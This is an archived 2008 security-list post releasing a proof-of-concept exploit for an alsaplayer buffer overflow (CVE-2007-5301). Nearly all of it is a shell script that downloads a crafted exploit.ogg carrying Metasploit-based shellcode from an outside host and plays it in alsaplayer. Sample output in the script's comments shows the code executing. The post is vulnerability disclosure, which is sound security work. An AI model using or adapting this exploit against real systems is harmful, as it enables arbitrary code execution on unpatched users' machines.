securityvulns SECURITYVULNS:DOC:19617
History: Apr 10, 2008 - 12:00 a.m.

[CVE-2007-5301] alsaplayer PoC - exploit

Hello,

I have released this PoC for the alsaplayer bug CVE-2007-5301.

You can find all the needed files at http://www.wekk.net/research/CVE-2007-5301/

#!/bin/sh
#
# http://www.wekk.net/research/CVE-2007-5301/CVE-2007-5301-exploit.sh
#
# Exploit for alsaplayer before 0.99.80-rc3. Tested with the debian etch package
# alsaplayer-common at version 0.99.76-9
#
# CVE-2007-5301 / DSA-1538
#
# by Albert Sellares <whats[at]wekk[dot]net> - http://www.wekk.net
# 2008-04-09
#
# Shellcode is based on metasploit framework. If you want to test it in other
# systems, maybe you have to recalculate offsets.
#
# Example:
#
# whats@debian:~$ ./CVE-2007-5301-exploit.sh
# Alsaplayer buffer overflow < 0.99.80-rc3
# by Albert Sellares <whats[at]wekk[dot]net> - http://www.wekk.net
#
# --12:19:27--  http://www.wekk.net/research/CVE-2007-5301/exploit.ogg
#            => `exploit.ogg'
# Resolving www.wekk.net... 64.22.71.90
# Connecting to www.wekk.net|64.22.71.90|:80... connected.
# HTTP request sent, awaiting response... 200 OK
# Length: 5,421 (5.3K) [application/ogg]
#
# 100%[===============================================================================>] 5,421
#
# 12:19:28 (37.00 KB/s) - `exploit.ogg' saved [5421/5421]
#
# uid=1000(whats) gid=1000(whats) groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(whats)

echo -e "Alsaplayer buffer overflow < 0.99.80-rc3"
echo -e "by Albert Sellares <whats[at]wekk[dot]net> - http://www.wekk.net\n\n"
wget http://www.wekk.net/research/CVE-2007-5301/exploit.ogg
alsaplayer exploit.ogg


Albert Sellares GPG id: 0x13053FFE
http://www.wekk.net [email protected]
Member of Catux.org http://catux.org
Linux User: 324456 Catalunya